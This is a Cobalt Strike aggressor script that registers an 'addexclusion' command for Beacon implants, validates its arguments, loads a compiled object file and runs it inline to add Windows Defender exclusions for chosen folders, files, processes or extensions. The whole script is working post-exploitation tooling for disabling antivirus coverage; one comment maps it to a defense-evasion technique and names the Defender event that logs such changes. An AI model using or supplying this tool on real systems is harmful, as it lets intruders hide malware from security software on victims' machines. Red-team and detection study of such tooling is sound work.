# author REDMED-X
# Register "addexclusion" with the Beacon console: the second argument is the
# one-line summary, the third is the long help text (INFO / ARGUMENTS / USAGE /
# EXAMPLES) built here by concatenating one string per help line.
beacon_command_register(
	"addexclusion",
	"Add a new exclusion to Windows Defender for a folder, file, process or extension.",
	"INFO:\nAdd a new exclusion to Windows Defender for a folder, file, process or extension.\n\n" .
	"ARGUMENTS:\n" .
	"[<exclusion type>]: specify one of the following exclusion types: path (file/folder), process, extension.\n" .
	"[<exclusion data>]: specify the data to add as an exclusion.\n\n" .
	"USAGE:\naddexclusion <exclusion type> <exclusion data>\n\n" .
	"EXAMPLES:\n" .
	"addexclusion path C:\\Users\\Public\\Downloads\n" .
	"addexclusion process C:\\Windows\\System32\\example.exe\n" .
	"addexclusion extension *.xll\n\n"
);
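# addexclusion <exclusion type> <exclusion data>
#
# Validates the operator's arguments, reads the addexclusion.o object file that
# sits next to this script, and runs its "go" entry point inline in the Beacon.
#   $1 - Beacon ID
#   $2 - exclusion type: path | process | extension
#   $3 - exclusion data (the folder/file, process or extension to exclude)
#
# Detection note: adding a Defender exclusion is a defense-evasion step
# (MITRE ATT&CK T1562.001). Defender logs configuration changes as event
# ID 5007 in the Microsoft-Windows-Windows Defender/Operational log, so
# unexpected exclusion additions are worth alerting on. How the BOF applies
# the change is not visible in this script.
alias addexclusion {
	# Sleep variables are global unless declared; keep these local so values
	# from one invocation cannot leak into another.
	local('$bid $excltype $excldata $handle $data $arg_data');

	$bid = $1;
	$excltype = $2;
	$excldata = $3;

	# Guard 1: an exclusion type must be given.
	if ($excltype eq "") {
		berror($bid, "Please specify one of the following exclusion types: path | process | extension.\n");
		return;
	}

	# Guard 2: only the three types named in the help text are accepted.
	if ($excltype ne "path" && $excltype ne "process" && $excltype ne "extension") {
		berror($bid, "This exclusion type isn't supported. Please specify one of the following options: path | process | extension.\n");
		return;
	}

	# Guard 3: the exclusion data must be given.
	if ($excldata eq "") {
		berror($bid, "Please specify the data to add as an exclusion.\n");
		return;
	}

	# Read the BOF object file; script_resource() resolves it relative to this script.
	$handle = openf(script_resource("addexclusion.o"));
	$data = readb($handle, -1);
	closef($handle);

	# A missing or unreadable object file yields no data; stop here with a
	# clear error instead of tasking the Beacon with an empty payload.
	if (strlen($data) == 0) {
		berror($bid, "Could not read addexclusion.o from the script directory.\n");
		return;
	}

	# Pack the arguments: "z" = zero-terminated string (type),
	# "Z" = zero-terminated wide-character string (data).
	$arg_data = bof_pack($bid, "zZ", $excltype, $excldata);

	blog($bid, "Tasked to add a new exclusion..");
	beacon_inline_execute($bid, $data, "go", $arg_data);
}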